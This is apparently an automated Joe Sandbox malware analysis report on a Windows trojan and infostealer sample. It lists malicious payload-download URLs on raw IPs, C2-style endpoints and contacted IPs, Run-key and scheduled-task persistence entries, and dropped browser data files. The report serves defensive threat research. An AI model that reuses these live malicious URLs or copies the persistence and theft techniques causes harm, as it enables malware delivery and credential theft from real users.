                                                                                                                                        http://www.winimage.com/zLibDllm_objectXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000002.2044194881.0000000004631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://ipinfo.io/RegAsm.exe, RegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            http://www.symauth.com/rpa00kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000002.2392516588.00000000026D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              http://schemas.xmlsoap.org/wsdl/aFBKY19rLrQU72E14du4WCPo.exe, 0000000A.00000000.1787917500.00000000001B2000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1)RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  http://147.45.44.104/yuop/66ed9885d9aee_Day2.exeC:RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://nerv.com.pe/vsfdhgg15.exeC:RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                      https://ipinfo.io/https://ipgeolocation.io/::SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1509897036.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1509897036.0000000004B1F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                        http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1#RegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://147.45.44.104/prog/66e705d09b33c_jack.exekRegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            https://ipinfo.io:443/widget/demo/8.46.123.33FE2RegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              http://41.216.188.190:80/api/wp-ping.phpRegAsm.exe, 00000003.00000002.1830248913.000000000146E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://nerv.com.pe:80/vsfdhgg15.exeRegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                  http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUVkcBn13x2kmdo9AMRXP8qT_4.exe, 00000010.00000002.2929361187.0000000000401000.00000020.00000001.01000000.00000010.sdmpfalse
                                                                                                                                                                    http://147.45.44.104/yuop/66eea6336b153_app16540406983468141987.exe#1vRegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://aka.ms/adal_token_cache_serializationXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                        https://iplogger.org/RegAsm.exe, 00000003.00000002.1830248913.0000000001458000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1832712263.0000000003EC4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://bitbucket.org/kcatelin/jameson/downloads/easyfirewall.exexeRegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://aka.ms/msal-net-iwaXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                              https://aka.ms/msal-net-up)XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                https://ipgeolocation.io/RegAsm.exefalse
                                                                                                                                                                                  http://41.216.188.190/api/wp-ping.phpRegAsm.exe, 00000003.00000002.1830248913.000000000142A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://nerv.com.pe:80/vfsdgdf.exeRegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                        http://41.216.188.190/api/wp-admin.phpxRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          http://147.45.44.104/0RegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://aka.ms/msal-net-enable-keychain-groupsXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                              https://aka.ms/msal-net-system-browsersXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                https://nerv.com.pe/vsfdhgg15.exenRegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                  http://147.45.44.104/yuop/66ed9885d9aee_Day2.exexeRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://api64.ipify.org/?format=json=RegAsm.exe, 00000003.00000002.1830248913.000000000142A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://remote-app-switcher.prod-east.RegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://login.microsoftonline.com/common/XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                          http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lylacRegAsm.exe, 00000003.00000002.1830248913.00000000014E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://nerv.com.pe/vsfdhgg15.exeaRegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                              https://aka.ms/msal-interactive-androidXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                https://aka.ms/msal-brokers.XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                  https://aka.ms/msal-net-2-released)XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                    http://147.45.44.104/yuop/66ee79315857f_setup33333.exe#lylakRegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://41.216.188.190/zRegAsm.exe, 00000003.00000002.1830248913.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://remote-app-switcher.stg-east.frontend.public.atl-paas.netRegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://nerv.com.pe/vsfdhgg15.exeURegAsm.exe, 00000003.00000002.1832712263.0000000003E60000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                                            https://login.microsoftonline.com/commonXO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                                              https://aka.ms/net-cache-persistence-errors.XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpfalse

                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                162.241.61.218
                                                                                                                                                                                                                                		nerv.com.peUnited States
                                                                                                                                                                                                                                		46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                                                                                                46.8.231.109
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticstrue
                                                                                                                                                                                                                                52.217.131.81
                                                                                                                                                                                                                                		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                176.113.115.33
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		49505SELECTELRUfalse
                                                                                                                                                                                                                                116.203.165.127
                                                                                                                                                                                                                                		unknownGermany
                                                                                                                                                                                                                                		24940HETZNER-ASDEtrue
                                                                                                                                                                                                                                34.117.59.81
                                                                                                                                                                                                                                		ipinfo.ioUnited States
                                                                                                                                                                                                                                		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                45.202.35.101
                                                                                                                                                                                                                                		unknownSeychelles
                                                                                                                                                                                                                                		139086ONL-HKOCEANNETWORKLIMITEDHKtrue
                                                                                                                                                                                                                                176.111.174.109
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		201305WILWAWPLfalse
                                                                                                                                                                                                                                103.130.147.211
                                                                                                                                                                                                                                		unknownTurkey
                                                                                                                                                                                                                                		63859MYREPUBLIC-AS-IDPTEkaMasRepublikIDtrue
                                                                                                                                                                                                                                147.45.44.104
                                                                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                                                                		2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                104.26.2.46
                                                                                                                                                                                                                                		iplogger.orgUnited States
                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                41.216.188.190
                                                                                                                                                                                                                                		unknownSouth Africa
                                                                                                                                                                                                                                		40676AS40676USfalse
                                                                                                                                                                                                                                104.237.62.213
                                                                                                                                                                                                                                		api64.ipify.orgUnited States
                                                                                                                                                                                                                                		18450WEBNXUSfalse
                                                                                                                                                                                                                                23.197.127.21
                                                                                                                                                                                                                                		steamcommunity.comUnited States
                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUtrue
                                                                                                                                                                                                                                5.53.124.195
                                                                                                                                                                                                                                		tventyvf20pt.topRussian Federation
                                                                                                                                                                                                                                		49505SELECTELRUtrue
                                                                                                                                                                                                                                185.166.143.50
                                                                                                                                                                                                                                		bitbucket.orgGermany
                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                92.119.114.169
                                                                                                                                                                                                                                		unknownUkraine
                                                                                                                                                                                                                                		204601ON-LINE-DATAServerlocation-NetherlandsDrontenNLfalse

                                                                                                                                                                                                                                Private

                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1514924
                                                                                                                                                                                                                                Start date and time:2024-09-21 13:32:20 +02:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 14m 38s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:49
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.mine.winEXE@96/142@11/18
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 75%
                                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 40.126.32.136, 40.126.32.133, 40.126.32.134, 20.190.160.14, 20.190.160.17, 40.126.32.72, 40.126.32.140, 20.190.160.20, 184.28.90.27, 20.42.73.29, 13.89.179.12
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, achievenmtynwjq.shop, ctldl.windowsupdate.com, pool.hashvault.pro, sentistivowmi.shop, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, chickerkuso.shop, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                                • Execution Graph export aborted for target aFBKY19rLrQU72E14du4WCPo.exe, PID 6948 because it is empty
                                                                                                                                                                                                                                • Execution Graph export aborted for target kFXFCWzZNovbPAcE4V3M4DAO.exe, PID 5828 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                07:33:31API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe modified
                                                                                                                                                                                                                                07:34:00API Interceptor14x Sleep call for process: RegAsm.exe modified
                                                                                                                                                                                                                                07:34:01API Interceptor1x Sleep call for process: aFBKY19rLrQU72E14du4WCPo.exe modified
                                                                                                                                                                                                                                07:34:02API Interceptor1x Sleep call for process: XO9lsdL5g6aUibu31TDcoBrI.exe modified
                                                                                                                                                                                                                                07:34:11API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                07:34:12API Interceptor492x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                                07:34:13API Interceptor3x Sleep call for process: kFXFCWzZNovbPAcE4V3M4DAO.exe modified
                                                                                                                                                                                                                                07:34:21API Interceptor1x Sleep call for process: _U2YDEzm5f5t9soM_Qc1Hc4U.exe modified
                                                                                                                                                                                                                                07:34:30API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                07:34:52API Interceptor1x Sleep call for process: jewkkwnf.exe modified
                                                                                                                                                                                                                                12:34:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
                                                                                                                                                                                                                                12:34:11Task SchedulerRun new task: jewkkwnf HR path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                12:34:14Task SchedulerRun new task: jewkkwnf LG path: C:\ProgramData\jewkkwnf\jewkkwnf.exe
                                                                                                                                                                                                                                12:34:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6 C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
                                                                                                                                                                                                                                12:34:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
                                                                                                                                                                                                                                12:35:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dell C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe
                                                                                                                                                                                                                                12:35:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dell C:\Users\user\Pictures\DreamifyCorp\ClientSecureUpdater.exe
                                                                                                                                                                                                                                12:36:04Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                C:\ProgramData\AFCBAEBAEBFHCAKFCAKECFCAFC

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                Entropy (8bit):0.03862698848467049
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
                                                                                                                                                                                                                                MD5:507BA3B63F5856A191688A30D7E2A93A
                                                                                                                                                                                                                                SHA1:1B799649D965FF1562753A9EB9B04AC83E5D7C57
                                                                                                                                                                                                                                SHA-256:10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
                                                                                                                                                                                                                                SHA-512:7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\BGIJDGCAEBFIIECAKFHIJEGIJE

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\BKKKFCFIIJJKKFHIEHJK

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9526
                                                                                                                                                                                                                                Entropy (8bit):5.515924904533179
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:efniR4oYbBp6Sp0pUhUxaXd6Y4nysZM2WklbBNBw8DUSl:hejGpCUvY4ysn7tpwx0
                                                                                                                                                                                                                                MD5:4580799F1DC5720A7EC1766400E98740
                                                                                                                                                                                                                                SHA1:92FD30F47EC545245B934EA492B3C64D5E609AA9
                                                                                                                                                                                                                                SHA-256:57F457D69933E9E8A98C32A05EEE96171419977D45AFFA674A9761556656B9FA
                                                                                                                                                                                                                                SHA-512:C0787F6584D1D26EBFD5AE59F32046CF1FF5AD1BEB1443F2FE93EB89EFA2F216CBC98E101BA3E38A2837ED9411A9DE1370E29ED96E83D8096547E53FEE964567
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "d3d72102-142d-47cc-a7b7-5b20541f2540");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696496527);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696496528);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                C:\ProgramData\DGIJDAFCFHIEHJJKEHJKKJKFCG

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):0.8467337400211222
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOiICtj+tCXq4E1:TeAFawNLopFgU10XJBO+tq0qj
                                                                                                                                                                                                                                MD5:7A03CC0EAD0AEFF210C3E60823AAA5EC
                                                                                                                                                                                                                                SHA1:8B9C99FBEC440663C71F10F70B9386C68CF0EC1D
                                                                                                                                                                                                                                SHA-256:D19C0286BB552C8F121A87A8B483E4997F846F0EB586F6BAF269C352678356CF
                                                                                                                                                                                                                                SHA-512:8BF799B9351399523796198E1B1160AD81E1C153148D24505AAD28143698DAF77665C26BBFB24650EB150AF8D92DD1623AE8ECB62D29C93EC3E4BB206E0C83DD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\EBKKKEGI

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                Entropy (8bit):1.1221538113908904
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                                                                                                                                                                MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
                                                                                                                                                                                                                                SHA1:6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
                                                                                                                                                                                                                                SHA-256:CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
                                                                                                                                                                                                                                SHA-512:01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\EGCBAFCFIJ.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):363424
                                                                                                                                                                                                                                Entropy (8bit):7.987313898927024
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:wF3qqFa1f0K9FDe8RGO93XozFt6tZjEZewycRZEelJYHq2bKEO:m3J6FDe8YOWz2tZwZrZEeDFEO
                                                                                                                                                                                                                                MD5:384A847AD2833788FA253433FD2EEA8D
                                                                                                                                                                                                                                SHA1:1984D8788FE40BD95A90D7D4E9DEA6C4E4FF6201
                                                                                                                                                                                                                                SHA-256:DE30491736617249B3E80FC9436ECF0F7675B3C3014509398C3DB7298F93336A
                                                                                                                                                                                                                                SHA-512:BCDBD44837629D8881C29A7C7F6A2D4E98B52FBC49952BAD2C89340A1DEE18FAC9987AAA8A3D91905A1F88A216C0E2501201A8665F3DF7D5F627FF71A2418AAC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 70%, Browse
                                                                                                                                                                                                                                Reputation:unknown
